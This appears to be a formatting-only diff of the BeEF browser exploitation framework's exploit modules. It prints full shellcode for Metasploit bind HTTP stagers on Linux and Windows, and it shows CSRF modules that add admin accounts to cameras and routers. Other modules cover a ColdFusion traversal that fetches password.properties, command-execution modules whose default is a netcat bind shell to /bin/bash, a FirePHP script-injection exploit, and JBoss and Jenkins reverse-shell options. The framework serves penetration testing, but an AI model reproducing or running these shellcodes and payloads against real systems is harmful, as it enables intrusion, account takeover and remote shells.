"\x58\x0f\x05\x48\x31\xf6\x48\x89\xdf\x6a\x32\x58\x0f\x05\x48\x31" +
"\xd2\x48\x31\xf6\x48\x89\xdf\x6a\x2b\x58\x0f\x05\x49\x89\xc7\x48" +
"\x89\xdf\x6a\x03\x58\x0f\x05\x48\x31\xff\x68\x00\x10\x00\x00\x5e" +
"\x6a\x07\x5a\x6a\x22\x41\x5a\x57\x57\x41\x59\x41\x58\x6a\x09\x58" +
"\x0f\x05\x49\x89\xc6\x4c\x89\xff\x4c\x89\xf6\x66\xba\x00\x10\x6a" +
"\x00\x58\x0f\x05\x4c\x89\xff\x6a\x03\x58\x0f\x05\x4c\x89\xf6\x81" +
"\x3e\x63\x6d\x64\x3d\x74\x05\x48\xff\xc6\xeb\xf3\x6a\x04\x58\x48" +
"\x01\xc6\xff\xe6"
}
))
end
def initialize(info = {})
super(merge_info(info,
'Name' => 'BeEF Bind HTTP Stager',
'Description' => 'Proxy web requests between a web browser and a shell',
'Author' => ['Bart Leppens'],
'License' => BSD_LICENSE,
'Platform' => 'linux',
'Arch' => ARCH_X64,
'Handler' => Msf::Handler::BeefBind,
'Convention' => 'beef_bind',
'Stager' =>
{
'RequiresMidstager' => false,
'Offsets' => { 'LPORT' => [54, 'n'] },
'Payload' =>
"\xfc\x48\x31\xd2\x6a\x01\x5e\x6a\x02\x5f\x6a\x29\x58\x0f\x05\x48" \
"\x89\xc3\x6a\x01\x49\x89\xe2\x6a\x08\x41\x58\x6a\x02\x5a\x6a\x01" \
"\x5e\x48\x89\xdf\x6a\x36\x58\x0f\x05\x48\x31\xc0\x6a\x10\x5a\x50" \
"\x50\xc7\x04\x24\x02\x00\x11\x5c\x48\x89\xe6\x48\x89\xdf\x6a\x31" \
"\x58\x0f\x05\x48\x31\xf6\x48\x89\xdf\x6a\x32\x58\x0f\x05\x48\x31" \
"\xd2\x48\x31\xf6\x48\x89\xdf\x6a\x2b\x58\x0f\x05\x49\x89\xc7\x48" \
"\x89\xdf\x6a\x03\x58\x0f\x05\x48\x31\xff\x68\x00\x10\x00\x00\x5e" \
"\x6a\x07\x5a\x6a\x22\x41\x5a\x57\x57\x41\x59\x41\x58\x6a\x09\x58" \
"\x0f\x05\x49\x89\xc6\x4c\x89\xff\x4c\x89\xf6\x66\xba\x00\x10\x6a" \
"\x00\x58\x0f\x05\x4c\x89\xff\x6a\x03\x58\x0f\x05\x4c\x89\xf6\x81" \
"\x3e\x63\x6d\x64\x3d\x74\x05\x48\xff\xc6\xeb\xf3\x6a\x04\x58\x48" \
"\x01\xc6\xff\xe6"
}))
end
end

63
modules/exploits/beefbind/shellcode_sources/msf/beef_bind-stager-linux-x86.rb
View File

@@ -5,43 +5,38 @@
# http://metasploit.com/framework/
##
require 'msf/core'
require 'msf/core/handler/beef_bind'
module MetasploitModule
include Msf::Payload::Stager
include Msf::Payload::Linux
include Msf::Payload::Stager
include Msf::Payload::Linux
def initialize(info = {})
super(merge_info(info,
'Name' => 'BeEF Bind HTTP Stager',
'Description' => 'Proxy web requests between a web browser and a shell',
'Author' => ['Bart Leppens'],
'License' => BSD_LICENSE,
'Platform' => 'linux',
'Arch' => ARCH_X86,
'Handler' => Msf::Handler::BeefBind,
'Convention' => 'beef_bind',
'Stager' =>
{
'RequiresMidstager' => false,
'Offsets' => { 'LPORT' => [ 47, 'n' ] },
'Payload' =>
"\xfc\x31\xc0\x31\xd2\x6a\x01\x5b\x50\x40\x50\x40\x50\x89\xe1\x6a" +
"\x66\x58\xcd\x80\x89\xc6\x6a\x0e\x5b\x6a\x04\x54\x6a\x02\x6a\x01" +
"\x56\x89\xe1\x6a\x66\x58\xcd\x80\x6a\x02\x5b\x52\x68\x02\x00\x11" +
"\x5c\x89\xe1\x6a\x10\x51\x56\x89\xe1\x6a\x66\x58\xcd\x80\x43\x43" +
"\x53\x56\x89\xe1\x6a\x66\x58\xcd\x80\x43\x52\x52\x56\x89\xe1\x6a" +
"\x66\x58\xcd\x80\x96\x93\xb8\x06\x00\x00\x00\xcd\x80\x6a\x00\x68" +
"\xff\xff\xff\xff\x6a\x22\x6a\x07\x68\x00\x10\x00\x00\x6a\x00\x89" +
"\xe3\x6a\x5a\x58\xcd\x80\x89\xc7\x66\xba\x00\x10\x89\xf9\x89\xf3" +
"\x6a\x03\x58\xcd\x80\x6a\x06\x58\xcd\x80\x81\x3f\x63\x6d\x64\x3d" +
"\x74\x03\x47\xeb\xf5\x6a\x04\x58\x01\xc7\xff\xe7"
}
))
end
def initialize(info = {})
super(merge_info(info,
'Name' => 'BeEF Bind HTTP Stager',
'Description' => 'Proxy web requests between a web browser and a shell',
'Author' => ['Bart Leppens'],
'License' => BSD_LICENSE,
'Platform' => 'linux',
'Arch' => ARCH_X86,
'Handler' => Msf::Handler::BeefBind,
'Convention' => 'beef_bind',
'Stager' =>
{
'RequiresMidstager' => false,
'Offsets' => { 'LPORT' => [47, 'n'] },
'Payload' =>
"\xfc\x31\xc0\x31\xd2\x6a\x01\x5b\x50\x40\x50\x40\x50\x89\xe1\x6a" \
"\x66\x58\xcd\x80\x89\xc6\x6a\x0e\x5b\x6a\x04\x54\x6a\x02\x6a\x01" \
"\x56\x89\xe1\x6a\x66\x58\xcd\x80\x6a\x02\x5b\x52\x68\x02\x00\x11" \
"\x5c\x89\xe1\x6a\x10\x51\x56\x89\xe1\x6a\x66\x58\xcd\x80\x43\x43" \
"\x53\x56\x89\xe1\x6a\x66\x58\xcd\x80\x43\x52\x52\x56\x89\xe1\x6a" \
"\x66\x58\xcd\x80\x96\x93\xb8\x06\x00\x00\x00\xcd\x80\x6a\x00\x68" \
"\xff\xff\xff\xff\x6a\x22\x6a\x07\x68\x00\x10\x00\x00\x6a\x00\x89" \
"\xe3\x6a\x5a\x58\xcd\x80\x89\xc7\x66\xba\x00\x10\x89\xf9\x89\xf3" \
"\x6a\x03\x58\xcd\x80\x6a\x06\x58\xcd\x80\x81\x3f\x63\x6d\x64\x3d" \
"\x74\x03\x47\xeb\xf5\x6a\x04\x58\x01\xc7\xff\xe7"
}))
end
end

85
modules/exploits/beefbind/shellcode_sources/msf/beef_bind-stager-windows-x86.rb
View File

@@ -9,54 +9,49 @@
# http://metasploit.com/framework/
##
require 'msf/core'
require 'msf/core/handler/beef_bind'
module MetasploitModule
include Msf::Payload::Stager
include Msf::Payload::Windows
include Msf::Payload::Stager
include Msf::Payload::Windows
def initialize(info = {})
super(merge_info(info,
'Name' => 'BeEF Bind HTTP Stager',
'Version' => '$Revision: 9179 $',
'Description' => 'Proxy web requests between a web browser and a shell',
'Author' => ['Ty Miller'],
'License' => BSD_LICENSE,
'Platform' => 'win',
'Arch' => ARCH_X86,
'Handler' => Msf::Handler::BeefBind,
'Convention' => 'beef_bind',
'Stager' =>
{
'RequiresMidstager' => false,
'Offsets' => { 'LPORT' => [ 200, 'n' ] },
'Payload' =>
# Length: 299 bytes
"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b" +
"\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\x31\xc0" +
"\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52\x57" +
"\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85\xc0\x74\x4a\x01" +
"\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b" +
"\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4" +
"\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b" +
"\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24" +
"\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d" +
"\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07" +
"\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00" +
"\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff" +
"\xd5\x97\x31\xdb\x53\x68\x02\x00\x11\x5c\x89\xe6\x6a\x10\x56\x57" +
"\x68\xc2\xdb\x37\x67\xff\xd5\x53\x57\x68\xb7\xe9\x38\xff\xff\xd5" +
"\x53\x53\x57\x68\x74\xec\x3b\xe1\xff\xd5\x57\x97\x68\x75\x6e\x4d" +
"\x61\xff\xd5\xbb\x00\x10\x00\x00\x6a\x40\x53\x53\x6a\x00\x68\x58" +
"\xa4\x53\xe5\xff\xd5\x89\xc6\x6a\x00\x53\x50\x57\x68\x02\xd9\xc8" +
"\x5f\xff\xd5\x57\x68\xc6\x96\x87\x52\xff\xd5\x81\x3e\x63\x6d\x64" +
"\x3d\x74\x03\x46\xeb\xf5\x83\xc6\x04\xff\xe6"
}
))
end
def initialize(info = {})
super(merge_info(info,
'Name' => 'BeEF Bind HTTP Stager',
'Version' => '$Revision: 9179 $',
'Description' => 'Proxy web requests between a web browser and a shell',
'Author' => ['Ty Miller'],
'License' => BSD_LICENSE,
'Platform' => 'win',
'Arch' => ARCH_X86,
'Handler' => Msf::Handler::BeefBind,
'Convention' => 'beef_bind',
'Stager' =>
{
'RequiresMidstager' => false,
'Offsets' => { 'LPORT' => [200, 'n'] },
'Payload' =>
# Length: 299 bytes
"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b" \
"\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\x31\xc0" \
"\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52\x57" \
"\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85\xc0\x74\x4a\x01" \
"\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b" \
"\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4" \
"\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b" \
"\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24" \
"\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d" \
"\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07" \
"\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00" \
"\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff" \
"\xd5\x97\x31\xdb\x53\x68\x02\x00\x11\x5c\x89\xe6\x6a\x10\x56\x57" \
"\x68\xc2\xdb\x37\x67\xff\xd5\x53\x57\x68\xb7\xe9\x38\xff\xff\xd5" \
"\x53\x53\x57\x68\x74\xec\x3b\xe1\xff\xd5\x57\x97\x68\x75\x6e\x4d" \
"\x61\xff\xd5\xbb\x00\x10\x00\x00\x6a\x40\x53\x53\x6a\x00\x68\x58" \
"\xa4\x53\xe5\xff\xd5\x89\xc6\x6a\x00\x53\x50\x57\x68\x02\xd9\xc8" \
"\x5f\xff\xd5\x57\x68\xc6\x96\x87\x52\xff\xd5\x81\x3e\x63\x6d\x64" \
"\x3d\x74\x03\x46\xeb\xf5\x83\xc6\x04\xff\xe6"
}))
end
end

24
modules/exploits/boastmachine_3_1_add_user_csrf/module.rb
View File

@@ -4,18 +4,16 @@
# See the file 'doc/COPYING' for copying permission
#
class Boastmachine_add_user_csrf < BeEF::Core::Command
def self.options
[
{ 'name' => 'base', 'ui_label' => 'boastMachine URL', 'value' => 'http://target/bmc/admin.php?action=add_user&blog' },
{ 'name' => 'username', 'ui_label' => 'Username', 'value' => 'username' },
{ 'name' => 'password', 'ui_label' => 'Password', 'value' => 'password' },
{ 'name' => 'email', 'ui_label' => 'E-mail Address', 'value' => 'email@example.com' }
]
end
def self.options
return [
{ 'name' => 'base', 'ui_label' => 'boastMachine URL', 'value' => 'http://target/bmc/admin.php?action=add_user&blog'},
{ 'name' => 'username', 'ui_label' => 'Username', 'value' => 'username'},
{ 'name' => 'password', 'ui_label' => 'Password', 'value' => 'password'},
{ 'name' => 'email', 'ui_label' => 'E-mail Address', 'value' => 'email@example.com'}
]
end
def post_execute
save({'result' => @datastore['result']})
end
def post_execute
save({ 'result' => @datastore['result'] })
end
end

22
modules/exploits/camera/airlive_ip_camera_csrf/module.rb
View File

@@ -4,17 +4,15 @@
# See the file 'doc/COPYING' for copying permission
#
class Airlive_add_user_csrf < BeEF::Core::Command
def self.options
return [
{'name' => 'base', 'ui_label' => 'Router web root', 'value' => 'http://192.168.0.1/'},
{'name' => 'user', 'ui_label' => 'Desired username', 'value' => 'beef'},
{'name' => 'pass', 'ui_label' => 'Desired password', 'value' => '__BeEF__'}
]
end
def post_execute
save({'result' => @datastore['result']})
end
def self.options
[
{ 'name' => 'base', 'ui_label' => 'Router web root', 'value' => 'http://192.168.0.1/' },
{ 'name' => 'user', 'ui_label' => 'Desired username', 'value' => 'beef' },
{ 'name' => 'pass', 'ui_label' => 'Desired password', 'value' => '__BeEF__' }
]
end
def post_execute
save({ 'result' => @datastore['result'] })
end
end

12
modules/exploits/camera/dlink_dcs_series_csrf/module.rb
View File

@@ -4,16 +4,14 @@
# See the file 'doc/COPYING' for copying permission
#
class Dlink_dcs_series_csrf < BeEF::Core::Command
def self.options
return [
{'name' => 'base', 'ui_label' => 'Camera web root', 'value' => 'http://192.168.0.1/'},
{'name' => 'password', 'ui_label' => 'Desired password', 'value' => '__BeEF__'}
[
{ 'name' => 'base', 'ui_label' => 'Camera web root', 'value' => 'http://192.168.0.1/' },
{ 'name' => 'password', 'ui_label' => 'Desired password', 'value' => '__BeEF__' }
]
end
def post_execute
save({'result' => @datastore['result']})
save({ 'result' => @datastore['result'] })
end
end

20
modules/exploits/camera/linksys_wvc_wireless_camera_csrf/module.rb
View File

@@ -4,16 +4,14 @@
# See the file 'doc/COPYING' for copying permission
#
class Linksys_wvc_wireless_camera_csrf < BeEF::Core::Command
def self.options
return [
{'name' => 'base', 'ui_label' => 'Router web root', 'value' => 'http://192.168.0.101/'},
{'name' => 'password', 'ui_label' => 'Desired password', 'value' => '__BeEF__'}
]
end
def post_execute
save({'result' => @datastore['result']})
end
def self.options
[
{ 'name' => 'base', 'ui_label' => 'Router web root', 'value' => 'http://192.168.0.101/' },
{ 'name' => 'password', 'ui_label' => 'Desired password', 'value' => '__BeEF__' }
]
end
def post_execute
save({ 'result' => @datastore['result'] })
end
end

22
modules/exploits/coldfusion_dir_traversal_exploit/module.rb
View File

@@ -4,23 +4,19 @@
# See the file 'doc/COPYING' for copying permission
#
class Coldfusion_dir_traversal_exploit < BeEF::Core::Command
def self.options
return [
{'name' => 'fileToRetrieve', 'ui_label' => 'Retrieve file (in CF /lib dir)', 'value' => 'password.properties'},
{ 'name' => 'os_combobox', 'type' => 'combobox', 'ui_label' => 'CF server OS', 'store_type' => 'arraystore',
'store_fields' => ['os'], 'store_data' => [['Windows'],['Linux/MacOSX/*BSD']],
'valueField' => 'os', 'displayField' => 'os', 'mode' => 'local', 'autoWidth' => true
},
{ 'name' => 'cf_version', 'type' => 'combobox', 'ui_label' => 'ColdFusion version', 'store_type' => 'arraystore',
'store_fields' => ['cf_version'], 'store_data' => [['8'],['9']],
'valueField' => 'cf_version', 'displayField' => 'cf_version', 'mode' => 'local', 'autoWidth' => true
}
[
{ 'name' => 'fileToRetrieve', 'ui_label' => 'Retrieve file (in CF /lib dir)', 'value' => 'password.properties' },
{ 'name' => 'os_combobox', 'type' => 'combobox', 'ui_label' => 'CF server OS', 'store_type' => 'arraystore',
'store_fields' => ['os'], 'store_data' => [['Windows'], ['Linux/MacOSX/*BSD']],
'valueField' => 'os', 'displayField' => 'os', 'mode' => 'local', 'autoWidth' => true },
{ 'name' => 'cf_version', 'type' => 'combobox', 'ui_label' => 'ColdFusion version', 'store_type' => 'arraystore',
'store_fields' => ['cf_version'], 'store_data' => [['8'], ['9']],
'valueField' => 'cf_version', 'displayField' => 'cf_version', 'mode' => 'local', 'autoWidth' => true }
]
end
def post_execute
save({'result' => @datastore['result']})
save({ 'result' => @datastore['result'] })
end
end

17
modules/exploits/extract_cmd_exec/module.rb
View File

@@ -12,19 +12,18 @@
# Source: http://sourceforge.net/projects/extract/
###
class Extract_cmd_exec < BeEF::Core::Command
def self.options
return [
{'name'=>'rhost', 'ui_label' => 'Remote Host', 'value' => '127.0.0.1'},
{'name'=>'rport', 'ui_label' => 'Remote Port', 'value' => '10100'},
{'name'=>'timeout', 'ui_label' => 'Timeout (s)', 'value' => '15'},
{'name'=>'cmd', 'ui_label' => 'Commands', 'description' => 'Enter shell commands to execute. Note: Spaces in the command are not supported.', 'type'=>'textarea', 'value'=>'{netcat,-l,-p,1337,-e,/bin/bash}', 'width'=>'200px' },
[
{ 'name' => 'rhost', 'ui_label' => 'Remote Host', 'value' => '127.0.0.1' },
{ 'name' => 'rport', 'ui_label' => 'Remote Port', 'value' => '10100' },
{ 'name' => 'timeout', 'ui_label' => 'Timeout (s)', 'value' => '15' },
{ 'name' => 'cmd', 'ui_label' => 'Commands', 'description' => 'Enter shell commands to execute. Note: Spaces in the command are not supported.', 'type' => 'textarea',
'value' => '{netcat,-l,-p,1337,-e,/bin/bash}', 'width' => '200px' }
]
end
def post_execute
save({'result' => @datastore['result']}) if not @datastore['result'].nil?
save({'fail' => @datastore['fail']}) if not @datastore['fail'].nil?
save({ 'result' => @datastore['result'] }) unless @datastore['result'].nil?
save({ 'fail' => @datastore['fail'] }) unless @datastore['fail'].nil?
end
end

17
modules/exploits/farsite_x25_remote_shell/module.rb
View File

@@ -1,23 +1,18 @@
#
class Farsite_x25_remote_shell < BeEF::Core::Command
def self.options
@configuration = BeEF::Core::Configuration.instance
beef_host = @configuration.beef_host
return [
[
{ 'name' => 'scheme', 'type' => 'combobox', 'ui_label' => 'HTTP(s)', 'store_type' => 'arraystore',
'store_fields' => ['http'], 'store_data' => [['HTTP'],['HTTPS']],
'valueField' => 'http', 'displayField' => 'http', 'mode' => 'local', 'autoWidth' => true
},
'store_fields' => ['http'], 'store_data' => [['HTTP'], ['HTTPS']],
'valueField' => 'http', 'displayField' => 'http', 'mode' => 'local', 'autoWidth' => true },
{ 'name' => 'rhost', 'ui_label' => 'Remote Host', 'value' => '10.0.0.1' },
{ 'name' => 'lhost', 'ui_label' => 'Local Host', 'value' => "#{beef_host}" },
{ 'name' => 'lport', 'ui_label' => 'Local Port', 'value' => '4444' }
{ 'name' => 'lhost', 'ui_label' => 'Local Host', 'value' => beef_host.to_s },
{ 'name' => 'lport', 'ui_label' => 'Local Port', 'value' => '4444' }
]
end
def post_execute
save({'result' => @datastore['result']})
save({ 'result' => @datastore['result'] })
end
end

47
modules/exploits/firephp/module.rb
View File

@@ -6,14 +6,13 @@
# PoC by Wireghoul: http://www.justanotherhacker.com/advisories/jahx132.html
###
class Firephp_code_exec < BeEF::Core::Command
def pre_send
rand_str = rand(32**10).to_s(32)
# load payload.js file
# generate payload:
# msfpayload firefox/shell_bind_tcp LPORT=4444 R > payload.js
payload = ""
payload = ''
f = File.open("#{$root_dir}/modules/exploits/firephp/payload.js")
f.each_line do |line|
payload << line
@@ -22,16 +21,16 @@ class Firephp_code_exec < BeEF::Core::Command
# construct exploit+payload HTTP response
exploit = {
"RequestHeaders" => {
"1"=>"#{rand(10)}",
"2"=>"#{rand(10)}",
"3"=>"#{rand(10)}",
"4"=>"#{rand(10)}",
"5"=>"#{rand(10)}",
"6"=>"#{rand(10)}",
"7"=>"#{rand(10)}",
"8"=>"#{rand(10)}",
"9"=>"#{rand(10)}",
'RequestHeaders' => {
'1' => rand(10).to_s,
'2' => rand(10).to_s,
'3' => rand(10).to_s,
'4' => rand(10).to_s,
'5' => rand(10).to_s,
'6' => rand(10).to_s,
'7' => rand(10).to_s,
'8' => rand(10).to_s,
'9' => rand(10).to_s,
"<script>#{payload}<\/SCRIPT>" => rand_str
}
}.to_json
@@ -39,21 +38,19 @@ class Firephp_code_exec < BeEF::Core::Command
# mount exploit+payload at /firephp
# @todo use Router class instead of bind_raw()
BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind_raw('200',
{
'Content-Type' => 'text/html',
'X-Wf-Protocol-1' => 'http://meta.wildfirehq.org/Protocol/JsonStream/0.2',
'X-Wf-1-Plugin-1' => 'http://meta.firephp.org/Wildfire/Plugin/FirePHP/Library-FirePHPCore/0.3',
'X-Wf-1-Structure-1' => 'http://meta.firephp.org/Wildfire/Structure/FirePHP/Dump/0.1',
'X-Wf-1-1-1-1' => "#{exploit.length}|#{exploit}|\r\n"
},
rand_str, # HTTP body
'/firephp', # URI mount point
-1
)
{
'Content-Type' => 'text/html',
'X-Wf-Protocol-1' => 'http://meta.wildfirehq.org/Protocol/JsonStream/0.2',
'X-Wf-1-Plugin-1' => 'http://meta.firephp.org/Wildfire/Plugin/FirePHP/Library-FirePHPCore/0.3',
'X-Wf-1-Structure-1' => 'http://meta.firephp.org/Wildfire/Structure/FirePHP/Dump/0.1',
'X-Wf-1-1-1-1' => "#{exploit.length}|#{exploit}|\r\n"
},
rand_str, # HTTP body
'/firephp', # URI mount point
-1)
end
def post_execute
save({'result' => @datastore['result']})
save({ 'result' => @datastore['result'] })
end
end

13
modules/exploits/glassfish_war_upload_xsrf/module.rb
View File

File diff suppressed because one or more lines are too long

17
modules/exploits/groovyshell_server_cmd_exec/module.rb
View File

@@ -4,19 +4,18 @@
# See the file 'doc/COPYING' for copying permission
#
class Groovyshell_server_command_execution < BeEF::Core::Command
def self.options
return [
{'name'=>'rhost', 'ui_label' => 'Remote Host', 'value' => '127.0.0.1'},
{'name'=>'rport', 'ui_label' => 'Remote Port', 'value' => '6789'},
{'name'=>'timeout', 'ui_label' => 'Timeout (s)', 'value' => '15'},
{'name'=>'cmd', 'ui_label' => 'Commands', 'description' => 'Enter shell commands to execute. Note: Spaces in the command are not supported.', 'type'=>'textarea', 'value'=>'/bin/sh -c id>/tmp/id;uname>/tmp/uname', 'width'=>'200px' },
[
{ 'name' => 'rhost', 'ui_label' => 'Remote Host', 'value' => '127.0.0.1' },
{ 'name' => 'rport', 'ui_label' => 'Remote Port', 'value' => '6789' },
{ 'name' => 'timeout', 'ui_label' => 'Timeout (s)', 'value' => '15' },
{ 'name' => 'cmd', 'ui_label' => 'Commands', 'description' => 'Enter shell commands to execute. Note: Spaces in the command are not supported.', 'type' => 'textarea',
'value' => '/bin/sh -c id>/tmp/id;uname>/tmp/uname', 'width' => '200px' }
]
end
def post_execute
save({'result' => @datastore['result']}) if not @datastore['result'].nil?
save({'fail' => @datastore['fail']}) if not @datastore['fail'].nil?
save({ 'result' => @datastore['result'] }) unless @datastore['result'].nil?
save({ 'fail' => @datastore['fail'] }) unless @datastore['fail'].nil?
end
end

30
modules/exploits/hp_ucmdb_add_user_csrf/module.rb
View File

@@ -5,27 +5,23 @@
#
class Hp_ucmdb_add_user_csrf < BeEF::Core::Command
def self.options
return [
{ 'name' => 'protocol', 'type' => 'combobox', 'ui_label' => 'Protocol', 'store_type' => 'arraystore',
'store_fields' => ['protocol'], 'store_data' => [['http'],['https']],
'valueField' => 'protocol', 'displayField' => 'protocol', 'mode' => 'local', 'value' => 'http', 'autoWidth' => true
},
{'name' => 'host', 'ui_label' => 'Host', 'value' => '127.0.0.1'},
{'name' => 'port', 'ui_label' => 'Port', 'value' => '8080'},
{ 'name' => 'usertype', 'type' => 'combobox', 'ui_label' => 'Type of user', 'store_type' => 'arraystore',
'store_fields' => ['usertype'], 'store_data' => [['createUser'],['createIntegrationUser']],
'valueField' => 'usertype', 'displayField' => 'usertype', 'mode' => 'local', 'value' => 'createUser', 'autoWidth' => true
},
{'name' => 'customerid', 'ui_label' => 'CustomerID', 'value' => '1'},
{'name' => 'username', 'ui_label' => 'Desired username', 'value' => 'BeEF'},
{'name' => 'password', 'ui_label' => 'Desired password', 'value' => '__BeEF__'}
[
{ 'name' => 'protocol', 'type' => 'combobox', 'ui_label' => 'Protocol', 'store_type' => 'arraystore',
'store_fields' => ['protocol'], 'store_data' => [['http'], ['https']],
'valueField' => 'protocol', 'displayField' => 'protocol', 'mode' => 'local', 'value' => 'http', 'autoWidth' => true },
{ 'name' => 'host', 'ui_label' => 'Host', 'value' => '127.0.0.1' },
{ 'name' => 'port', 'ui_label' => 'Port', 'value' => '8080' },
{ 'name' => 'usertype', 'type' => 'combobox', 'ui_label' => 'Type of user', 'store_type' => 'arraystore',
'store_fields' => ['usertype'], 'store_data' => [['createUser'], ['createIntegrationUser']],
'valueField' => 'usertype', 'displayField' => 'usertype', 'mode' => 'local', 'value' => 'createUser', 'autoWidth' => true },
{ 'name' => 'customerid', 'ui_label' => 'CustomerID', 'value' => '1' },
{ 'name' => 'username', 'ui_label' => 'Desired username', 'value' => 'BeEF' },
{ 'name' => 'password', 'ui_label' => 'Desired password', 'value' => '__BeEF__' }
]
end
def post_execute
save({'result' => @datastore['result']})
save({ 'result' => @datastore['result'] })
end
end

25
modules/exploits/jboss_jmx_upload_exploit/module.rb
View File

@@ -4,24 +4,21 @@
# See the file 'doc/COPYING' for copying permission
#
class Jboss_jmx_upload_exploit < BeEF::Core::Command
def self.options
return [
{'name' => 'rhost', 'ui_label' => 'Remote Target Host', 'value' => '127.0.0.1'},
{'name' => 'rport', 'ui_label' => 'Remote Target Port', 'value' => '8080'},
{'name' => 'lhost', 'ui_label' => 'MSF Listener Host', 'value' => '127.0.0.1'},
{'name' => 'lport', 'ui_label' => 'MSF Listener Port (or bind)', 'value' => '6666'},
{'name' => 'injectedCommand', 'ui_label' => 'Command to execute', 'value' => 'cmd.exe'},
{'name' => 'jspName', 'ui_label' => 'Malicious JSP name', 'value' => rand(32**20).to_s(32)},
{ 'name' => 'payload', 'type' => 'combobox', 'ui_label' => 'Payload', 'store_type' => 'arraystore',
'store_fields' => ['payload'], 'store_data' => [['reverse'],['bind']],
'valueField' => 'payload', 'displayField' => 'payload', 'mode' => 'local', 'autoWidth' => true
}
[
{ 'name' => 'rhost', 'ui_label' => 'Remote Target Host', 'value' => '127.0.0.1' },
{ 'name' => 'rport', 'ui_label' => 'Remote Target Port', 'value' => '8080' },
{ 'name' => 'lhost', 'ui_label' => 'MSF Listener Host', 'value' => '127.0.0.1' },
{ 'name' => 'lport', 'ui_label' => 'MSF Listener Port (or bind)', 'value' => '6666' },
{ 'name' => 'injectedCommand', 'ui_label' => 'Command to execute', 'value' => 'cmd.exe' },
{ 'name' => 'jspName', 'ui_label' => 'Malicious JSP name', 'value' => rand(32**20).to_s(32) },
{ 'name' => 'payload', 'type' => 'combobox', 'ui_label' => 'Payload', 'store_type' => 'arraystore',
'store_fields' => ['payload'], 'store_data' => [['reverse'], ['bind']],
'valueField' => 'payload', 'displayField' => 'payload', 'mode' => 'local', 'autoWidth' => true }
]
end
def post_execute
save({'result' => @datastore['result']})
save({ 'result' => @datastore['result'] })
end
end

18
modules/exploits/jenkins_groovy_code_exec/module.rb
View File

@@ -4,12 +4,11 @@
# See the file 'doc/COPYING' for copying permission
#
class Jenkins_groovy_code_exec < BeEF::Core::Command
def self.options
configuration = BeEF::Core::Configuration.instance
lhost = configuration.beef_host
lhost = "" if lhost == "0.0.0.0"
return [
lhost = '' if lhost == '0.0.0.0'
[
{ 'name' => 'rhost', 'ui_label' => 'Remote Host', 'value' => '127.0.0.1' },
{ 'name' => 'rport', 'ui_label' => 'Remote Port', 'value' => '80' },
{ 'name' => 'uri', 'ui_label' => 'Target URI', 'value' => '/jenkins/' },
@@ -18,34 +17,31 @@ class Jenkins_groovy_code_exec < BeEF::Core::Command
'ui_label' => 'Target Protocol',
'store_type' => 'arraystore',
'store_fields' => ['rproto'],
'store_data' => [ ['http'], ['https'] ],
'store_data' => [['http'], ['https']],
'emptyText' => 'Select a protocol (HTTP/HTTPS)',
'valueField' => 'rproto',
'displayField' => 'rproto',
'mode' => 'local',
'forceSelection' => 'true',
'autoWidth' => true
},
'autoWidth' => true },
{ 'name' => 'payload',
'type' => 'combobox',
'ui_label' => 'Payload',
'store_type' => 'arraystore',
'store_fields' => ['payload'],
'store_data' => [ ['reverse_bash'], ['reverse_netcat'], ['reverse_python'] ],
'store_data' => [['reverse_bash'], ['reverse_netcat'], ['reverse_python']],
'emptyText' => 'Select a payload',
'valueField' => 'payload',
'displayField' => 'payload',
'mode' => 'local',
'forceSelection' => 'false',
'autoWidth' => true
},
'autoWidth' => true },
{ 'name' => 'lhost', 'ui_label' => 'Listen Host', 'value' => lhost },
{ 'name' => 'lport', 'ui_label' => 'Listen Port', 'value' => '8080' }
]
end
def post_execute
save({'result' => @datastore['result']})
save({ 'result' => @datastore['result'] })
end
end

16
modules/exploits/kemp_command_execution/module.rb
View File

@@ -4,19 +4,17 @@
# See the file 'doc/COPYING' for copying permission
#
class Kemp_command_execution < BeEF::Core::Command
def self.options
return [
{'name'=>'rhost', 'ui_label' => 'URL', 'value' => 'https://x.x.x.x'},
{'name'=>'rport', 'ui_label' => 'Remote Port', 'value' => '443'},
{'name'=>'timeout', 'ui_label' => 'Timeout (s)', 'value' => '15'},
{'name'=>'cmd', 'ui_label' => 'Command', 'description' => 'Enter shell command to execute.', 'type'=>'textarea', 'value'=>"ls", 'width'=>'200px' },
[
